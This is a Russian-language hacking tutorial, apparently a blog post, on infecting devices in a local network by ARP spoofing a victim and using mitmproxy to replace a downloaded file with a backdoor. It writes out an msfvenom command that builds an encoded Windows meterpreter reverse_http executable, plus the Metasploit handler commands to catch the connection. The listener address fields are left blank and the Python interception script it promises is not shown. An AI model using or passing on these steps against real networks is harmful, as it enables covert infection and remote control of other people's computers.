March 5, 2020

инфильтрация сети с помощью MitmProxy / Backdoor Download

Дарова, парни! я покажу вам, как использовать "MitmProxy", и мы запустим скрипт, сделав свой код python для "MitmProxy"

Код Python, который мы напишем, предназначен для устройства в локальной сети, и когда жертва загрузит файл, у него будет бэкдор, который мы сейчас сделаем, и заразим устройство

Общая информация

Mitmproxy представляет собой целый набор программных инструментов, в который входят:

  • собственно mitmproxy — интерактивная консольная программа, перехватывающая трафик «на лету»;
  • mitmdump — утилита, которую можно описать как аналог tcpdump для протокола HTTP: она перехватывает трафик и сохраняет всю информацию о нем в текстовый файл;
  • libmproxy — библиотека для Python, с помощью которой реализуется вся функциональность mitmproxy.

Что мы сегодня сделаем

  • 3 - Просканируем гостей,в сети через "Netdiscover или Arp-scan" добавлю от себя Netdiscover сразу показывает имена устройств.
  • 4 - Загрузим mitmproxy с Github и внесем изменения
  • 5 - Совершим атаку "ArpSpoof" , также можно использовать в Mitmf : Bettercap, Ettercap
  • 6- Мы Напишем Необходимые Команды [ Ip Forwarding ]
  • 7 - Поднимем наш веб-сервер и выполним "переадресацию портов"
  • 8 - мы подготовим наш бэкдор с инструментами , такими как Msfvenom , Veil, TheFatrat
  • 9 - MSFConsole мы сделаем наш бэкдор готовым к прослушиванию
  • 10 - Мы напишем наш код Python, в редактора "Geany"
  • 11 - Перед Запуском Mitmdump мы сделаем переадресации портов
  • 12 - MitmDump, мы будем индексировать наш скрипт устройству, который мы выбрали в моем случае это ПК

Ладно перейдем к делу!

Пакеты которые нам нужны

sudo apt-get install dsniff
sudo apt install python-pip
sudo apt install python3-pip

Прописываем команду arp-scan -l если не знаете на каком айпи сидит ваше устройство советую netdiscover -i

Потом переходим по этой ссылке mitmproxy

Извлекаем в opt,через пару шагов отредактируем этот файл

Теперь мы получим список гостей в нашей сети,и выберем цель которую хотим атаковать

Получения информации
Запуск апачи

Команда для создания бэкдора

msfvenom -p windows/meterpreter/reverse_http LHOST= LPORT= raw -e x86/shikata_ga_nai -i 7 -f exe -o /root/Desktop/mybackdoor.exe

Создания бэкдора

Установим этот редактор чтобы изменить mitmproxy.py

Открываем Geany,создаем файл и прописываем этот код,после чего сохраняем.

Потом на виртуалке,переходим по ссылке и скачиваеться наш бэкдор

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_http

set LHOST

set LPORT

exploit